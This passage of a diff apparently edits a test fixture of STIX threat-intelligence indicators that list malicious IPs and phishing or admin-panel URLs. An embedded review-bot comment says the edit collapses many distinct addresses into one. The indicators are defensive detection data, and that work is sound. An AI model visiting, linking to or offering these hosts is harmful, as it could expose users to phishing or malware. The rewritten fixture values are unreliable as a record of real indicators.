CyberCrime","id":"indicator--d74f403a-0673-4594-a4fc-61a22ab7fa21","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-02-08T14:02:59.31Z","name":"mal_ip: 81.4.100.75","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '81.4.100.75']","type":"indicator","valid_from":"2020-02-08T14:02:59.31Z"} -{"created":"2020-02-08T14:02:59.432Z","description":"TS ID: 55298069175; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--3cac5b3d-ffa6-4f5c-b190-7de9eb2e5a00","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-08T14:02:59.432Z","name":"mal_ip: 8.209.78.16","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '8.209.78.16']","type":"indicator","valid_from":"2020-02-08T14:02:59.432Z"} +{"created":"2020-02-08T14:02:59.31Z","description":"TS ID: 55298071076; iType: mal_ip; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime","id":"indicator--d74f403a-0673-4594-a4fc-61a22ab7fa21","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-02-08T14:02:59.31Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:02:59.31Z"} +{"created":"2020-02-08T14:02:59.432Z","description":"TS ID: 55298069175; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--3cac5b3d-ffa6-4f5c-b190-7de9eb2e5a00","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-08T14:02:59.432Z","name":"mal_ip: 
89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:02:59.432Z"} {"created":"2020-02-08T14:03:17.953Z","description":"TS ID: 55298072311; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--86c43dc8-a27e-4f30-a29e-ba174f0a03ef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-08T14:03:17.953Z","name":"mal_url: http://bacanacabana.com.br/wp-includes/css/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://bacanacabana.com.br/wp-includes/css/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:03:17.953Z"} {"created":"2020-02-08T14:03:21.626Z","description":"TS ID: 55298071960; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--d900b770-4f2f-4597-ba97-a3e62646eca8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-08T14:03:21.626Z","name":"mal_url: http://xgkxc.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xgkxc.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:03:21.626Z"} {"created":"2020-02-08T14:03:23.941Z","description":"TS ID: 55298070427; iType: mal_url; State: active; Org: SBCLOUD; Source: CyberCrime","id":"indicator--be5fb697-b554-4042-8185-f4148a5d02a2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-08T14:03:23.941Z","name":"mal_url: http://boomcoins.ml/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://boomcoins.ml/login']","type":"indicator","valid_from":"2020-02-08T14:03:23.941Z"} {"created":"2020-02-08T14:03:34.136Z","description":"TS ID: 55298071042; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime","id":"indicator--31a6a6c3-f385-421f-9ebb-d5cdced1dfd5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-02-08T14:03:34.136Z","name":"mal_url: http://asstubevideos.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://asstubevideos.com/login']","type":"indicator","valid_from":"2020-02-08T14:03:34.136Z"} {"created":"2020-02-08T14:03:34.507Z","description":"TS ID: 55298069289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--8c9846cd-2a0b-40c3-91f2-5893c05b1560","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-08T14:03:34.507Z","name":"mal_url: http://f0397413.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0397413.xsph.ru/login']","type":"indicator","valid_from":"2020-02-08T14:03:34.507Z"} -{"created":"2020-02-08T14:03:42.075Z","description":"TS ID: 55298071476; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--4e5ac673-3459-45d1-817e-d7aca2850c5e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:03:42.075Z","name":"mal_ip: 45.145.0.14","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.145.0.14']","type":"indicator","valid_from":"2020-02-08T14:03:42.075Z"} +{"created":"2020-02-08T14:03:42.075Z","description":"TS ID: 55298071476; iType: mal_ip; State: active; Source: 
CyberCrime","id":"indicator--4e5ac673-3459-45d1-817e-d7aca2850c5e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:03:42.075Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:03:42.075Z"} {"created":"2020-02-08T14:03:42.298Z","description":"TS ID: 55298069324; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--8d463a9a-c285-4af6-91e8-bfd7e65d820f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-08T14:03:42.298Z","name":"mal_url: http://f0396512.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0396512.xsph.ru/login']","type":"indicator","valid_from":"2020-02-08T14:03:42.298Z"} {"created":"2020-02-08T14:03:46.901Z","description":"TS ID: 55298070290; iType: mal_url; State: active; Org: Avguro Technologies Ltd. 
Hosting service provider; Source: CyberCrime","id":"indicator--bf76b431-6b24-4b63-89d6-4f026a2e5169","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-63"],"modified":"2020-02-08T14:03:46.901Z","name":"mal_url: http://j1043204.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://j1043204.myjino.ru/login']","type":"indicator","valid_from":"2020-02-08T14:03:46.901Z"} {"created":"2020-02-08T14:03:47.108Z","description":"TS ID: 55298069358; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--646c9b00-80f7-4457-b2bc-1da854c211d6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-08T14:03:47.108Z","name":"mal_url: http://f0387320.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387320.xsph.ru/login']","type":"indicator","valid_from":"2020-02-08T14:03:47.108Z"} 
@@ -395,24 +395,24 @@ {"created":"2020-02-08T14:03:58.41Z","description":"TS ID: 55298072652; iType: mal_url; State: active; Org: Netrouting; Source: CyberCrime","id":"indicator--84dceb2a-fb38-4d98-9005-7f05460e8f3a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-48"],"modified":"2020-02-08T14:03:58.41Z","name":"mal_url: http://209.182.217.85/auth.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://209.182.217.85/auth.php']","type":"indicator","valid_from":"2020-02-08T14:03:58.41Z"} {"created":"2020-02-08T14:04:30.627Z","description":"TS ID: 55298073012; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--ca97a773-4de3-4c9d-8f4c-b7350a615c45","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-08T14:04:30.627Z","name":"mal_url: http://fentq.org/x/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fentq.org/x/panel/admin.php']","type":"indicator","valid_from":"2020-02-08T14:04:30.627Z"} {"created":"2020-02-08T14:04:30.659Z","description":"TS ID: 55298072708; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime","id":"indicator--d0653208-3d17-48c8-a47d-a6dede383ad8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-08T14:04:30.659Z","name":"mal_url: http://castmart.ga/~zadmin/beta/aps/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/beta/aps/login.php']","type":"indicator","valid_from":"2020-02-08T14:04:30.659Z"} -{"created":"2020-02-08T14:04:30.733Z","description":"TS ID: 55298072377; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: 
CyberCrime","id":"indicator--7873494f-24fb-42a6-ae17-299b9825e220","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-22"],"modified":"2020-02-08T14:04:30.733Z","name":"mal_ip: 162.241.6.97","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.241.6.97']","type":"indicator","valid_from":"2020-02-08T14:04:30.733Z"} +{"created":"2020-02-08T14:04:30.733Z","description":"TS ID: 55298072377; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--7873494f-24fb-42a6-ae17-299b9825e220","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-22"],"modified":"2020-02-08T14:04:30.733Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:04:30.733Z"} {"created":"2020-02-08T14:04:30.81Z","description":"TS ID: 55298072245; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--14e760f3-eb76-412c-ab7b-8267bd65deb5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-08T14:04:30.81Z","name":"mal_url: http://hanmha.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://hanmha.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:04:30.81Z"} {"created":"2020-02-08T14:04:30.84Z","description":"TS ID: 55298072104; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--8a5aa5ab-e8ec-4641-9cfb-179df3bede39","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-08T14:04:30.84Z","name":"mal_url: 
http://trouserlanditd.com/dabs/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trouserlanditd.com/dabs/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:04:30.84Z"} -{"created":"2020-02-08T14:04:30.927Z","description":"TS ID: 55298071479; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--5bbb8e55-9eb7-4b8a-a7aa-d79c53a0e596","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:04:30.927Z","name":"mal_url: http://45.145.0.14/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.145.0.14/login']","type":"indicator","valid_from":"2020-02-08T14:04:30.927Z"} +{"created":"2020-02-08T14:04:30.927Z","description":"TS ID: 55298071479; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--5bbb8e55-9eb7-4b8a-a7aa-d79c53a0e596","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:04:30.927Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-08T14:04:30.927Z"} {"created":"2020-02-08T14:04:35.541Z","description":"TS ID: 55298071733; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--cd3bea2d-dd64-463e-ae03-2a582c2261f2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-02-08T14:04:35.541Z","name":"mal_url: http://trust-oot.info/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trust-oot.info/login']","type":"indicator","valid_from":"2020-02-08T14:04:35.541Z"} 
-{"created":"2020-02-08T14:04:35.641Z","description":"TS ID: 55298069948; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--543aeaab-e5f0-42bc-afa5-6cd3cc9a26ec","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-08T14:04:35.641Z","name":"mal_ip: 217.8.117.66","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.8.117.66']","type":"indicator","valid_from":"2020-02-08T14:04:35.641Z"} -{"created":"2020-02-08T14:04:37.657Z","description":"TS ID: 55298071095; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime","id":"indicator--d2987902-59e6-4667-b011-f20e93e283d9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-02-08T14:04:37.657Z","name":"mal_url: http://81.4.100.75/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://81.4.100.75/login']","type":"indicator","valid_from":"2020-02-08T14:04:37.657Z"} +{"created":"2020-02-08T14:04:35.641Z","description":"TS ID: 55298069948; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--543aeaab-e5f0-42bc-afa5-6cd3cc9a26ec","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-08T14:04:35.641Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:04:35.641Z"} +{"created":"2020-02-08T14:04:37.657Z","description":"TS ID: 55298071095; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime","id":"indicator--d2987902-59e6-4667-b011-f20e93e283d9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-02-08T14:04:37.657Z","name":"mal_url: 
http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-08T14:04:37.657Z"} {"created":"2020-02-08T14:04:41.785Z","description":"TS ID: 55298072117; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--093718d8-bb0e-4816-ab4b-c97cb95d5531","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-02-08T14:04:41.785Z","name":"mal_url: http://serviciotecnicoenperu.com/contactar/zz/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://serviciotecnicoenperu.com/contactar/zz/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:04:41.785Z"} {"created":"2020-02-08T14:04:43.759Z","description":"TS ID: 55298071859; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--dfdca2f0-75cc-4e33-9045-e2ba136c0183","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-08T14:04:43.759Z","name":"mal_url: http://xgkxc.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xgkxc.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:04:43.759Z"} {"created":"2020-02-08T14:04:43.783Z","description":"TS ID: 55298070283; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--0e501865-d0a0-493b-8302-02efe0f2c5d1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-08T14:04:43.783Z","name":"mal_url: http://kmfjlool.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://kmfjlool.xyz/login']","type":"indicator","valid_from":"2020-02-08T14:04:43.783Z"} -{"created":"2020-02-09T05:09:33.689Z","description":"TS ID: 55300025372; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--91f46249-8fa5-4e88-bb38-0448b08b5448","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-09T05:09:33.689Z","name":"mal_ip: 147.139.139.206","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '147.139.139.206']","type":"indicator","valid_from":"2020-02-09T05:09:33.689Z"} +{"created":"2020-02-09T05:09:33.689Z","description":"TS ID: 55300025372; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--91f46249-8fa5-4e88-bb38-0448b08b5448","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-09T05:09:33.689Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-09T05:09:33.689Z"} {"created":"2020-02-10T02:01:30.459Z","description":"TS ID: 55303483956; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--07925c70-b345-4aa6-8f40-e19602cf0429","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-10T02:01:30.459Z","name":"mal_url: http://pentestblog.xyz/panel/login/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pentestblog.xyz/panel/login/']","type":"indicator","valid_from":"2020-02-10T02:01:30.459Z"} {"created":"2020-02-10T02:01:36.571Z","description":"TS ID: 55303483889; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: 
CyberCrime","id":"indicator--00195f28-4745-41a3-9710-7e2266b1270e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-02-10T02:01:36.571Z","name":"mal_url: http://f0386817.xsph.ru/32cd6120/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0386817.xsph.ru/32cd6120/login.php']","type":"indicator","valid_from":"2020-02-10T02:01:36.571Z"} {"created":"2020-02-10T02:01:36.621Z","description":"TS ID: 55303483880; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--eae0ef0b-3b77-401b-8835-4ad9cb97171d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-10T02:01:36.621Z","name":"mal_url: http://f0395086.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0395086.xsph.ru/login']","type":"indicator","valid_from":"2020-02-10T02:01:36.621Z"} -{"created":"2020-02-10T02:02:06.427Z","description":"TS ID: 55303483638; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime","id":"indicator--05d25a1d-cf55-4b36-93ee-dbf618980b2f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-44"],"modified":"2020-02-10T02:02:06.427Z","name":"mal_url: http://45.76.237.80/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.76.237.80/panel/admin.php']","type":"indicator","valid_from":"2020-02-10T02:02:06.427Z"} +{"created":"2020-02-10T02:02:06.427Z","description":"TS ID: 55303483638; iType: mal_url; State: active; Org: Choopa, LLC; Source: 
CyberCrime","id":"indicator--05d25a1d-cf55-4b36-93ee-dbf618980b2f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-44"],"modified":"2020-02-10T02:02:06.427Z","name":"mal_url: http://89.160.20.156/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/panel/admin.php']","type":"indicator","valid_from":"2020-02-10T02:02:06.427Z"} {"created":"2020-02-10T02:02:14.887Z","description":"TS ID: 55303483942; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--9af2b6ee-aec5-481a-8e93-2a7153fcf05e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-10T02:02:14.887Z","name":"mal_url: http://worldatdoor.in/wire/32/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/wire/32/panel/admin.php']","type":"indicator","valid_from":"2020-02-10T02:02:14.887Z"} {"created":"2020-02-10T02:02:16.263Z","description":"TS ID: 55303483899; iType: mal_url; State: active; Org: Avguro Technologies Ltd. 
Hosting service provider; Source: CyberCrime","id":"indicator--1641ace0-37a5-4364-8400-e422b5cdbcec","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-02-10T02:02:16.263Z","name":"mal_url: http://wwe23pro.myjino.ru/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://wwe23pro.myjino.ru/login.php']","type":"indicator","valid_from":"2020-02-10T02:02:16.263Z"} -{"created":"2020-02-10T02:02:35.848Z","description":"TS ID: 55303483868; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--3e09e501-0b80-4de6-b5a9-1d30b5687a24","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-44"],"modified":"2020-02-10T02:02:35.848Z","name":"mal_ip: 2.59.117.6","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '2.59.117.6']","type":"indicator","valid_from":"2020-02-10T02:02:35.848Z"} +{"created":"2020-02-10T02:02:35.848Z","description":"TS ID: 55303483868; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--3e09e501-0b80-4de6-b5a9-1d30b5687a24","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-44"],"modified":"2020-02-10T02:02:35.848Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-10T02:02:35.848Z"} {"created":"2020-02-10T02:02:45.419Z","description":"TS ID: 55303483940; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--85ab9568-e7f5-40c6-935d-8bdbe263970c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-65"],"modified":"2020-02-10T02:02:45.419Z","name":"mal_url: 
http://garex.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://garex.xyz/login']","type":"indicator","valid_from":"2020-02-10T02:02:45.419Z"} {"created":"2020-02-10T02:02:47.096Z","description":"TS ID: 55303483952; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--05509090-9cd9-43b0-892c-02318134a893","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-02-10T02:02:47.096Z","name":"mal_url: http://jerichoconstructioncompany.com/wps/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jerichoconstructioncompany.com/wps/panel/admin.php']","type":"indicator","valid_from":"2020-02-10T02:02:47.096Z"} {"created":"2020-02-10T02:02:55.786Z","description":"TS ID: 55303483873; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--c884bffa-1248-483b-bdf8-dada05340ea4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-10T02:02:55.786Z","name":"mal_url: http://f0396079.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0396079.xsph.ru/login']","type":"indicator","valid_from":"2020-02-10T02:02:55.786Z"} 
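Review bot: Every distinct indicator in this hunk (162.241.6.97, 45.145.0.14, 217.8.117.66, 81.4.100.75, 147.139.139.206, 45.76.237.80, 2.59.117.6) is rewritten to the single value 89.160.20.156, so records that keep different `id`, `TS ID` and `Org` values (CyrusOne LLC, Alibaba, Choopa, LLC, RouteLabel V.O.F.) now carry an identical `ipv4-addr`/`url` pattern, and the fixture exercises the pipeline's IP extraction and any enrichment or dedup step on exactly one address. A regression that mishandles a particular address shape would not surface, and the expected-output file presumably has to be regenerated with many identical `threat.indicator` values, which makes it hard to tell which record produced which document. Consider spreading the replacements over a few distinct addresses from the same supported test range (e.g. `<TEST-RANGE-ADDR-1>`, `<TEST-RANGE-ADDR-2>`, placeholders to be taken from the documented subset) so that each record's `name` and `pattern` remain distinguishable. Also note that the hunk above, whose start is outside this chunk, contains a record whose `name` reads `mal_url: http://89.160.20.156/xcool!/admin.php` while its `pattern` reads `[url:value = 'http://189.160.20.156/xcool!/admin.php']`; the extra `1` leaves the name and pattern disagreeing and reintroduces an address outside the chosen subset.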
@@ -427,43 +427,43 @@
 {"created":"2020-02-11T02:07:49.317Z","description":"TS ID: 55306531320; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--782c926c-e92f-451e-8aaf-dbe446b8abe4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-02-11T02:07:49.317Z","name":"mal_url: http://klickus.com/okye/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://klickus.com/okye/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-11T02:07:49.317Z"}
 {"created":"2020-02-11T02:07:49.341Z","description":"TS ID: 55306531298; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--336d437c-cb0b-473c-b157-3edad63d3a65","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-02-11T02:07:49.341Z","name":"mal_url: http://klickus.com/gozie/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://klickus.com/gozie/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-11T02:07:49.341Z"}
 {"created":"2020-02-12T02:02:34.926Z","description":"TS ID: 55309106417; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--1fff5727-69fd-4477-a610-3542e53642ae","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-12T02:02:34.926Z","name":"mal_url: http://alwaysdelivery.xyz/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://alwaysdelivery.xyz/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-12T02:02:34.926Z"}
-{"created":"2020-02-12T02:03:19.477Z","description":"TS ID: 
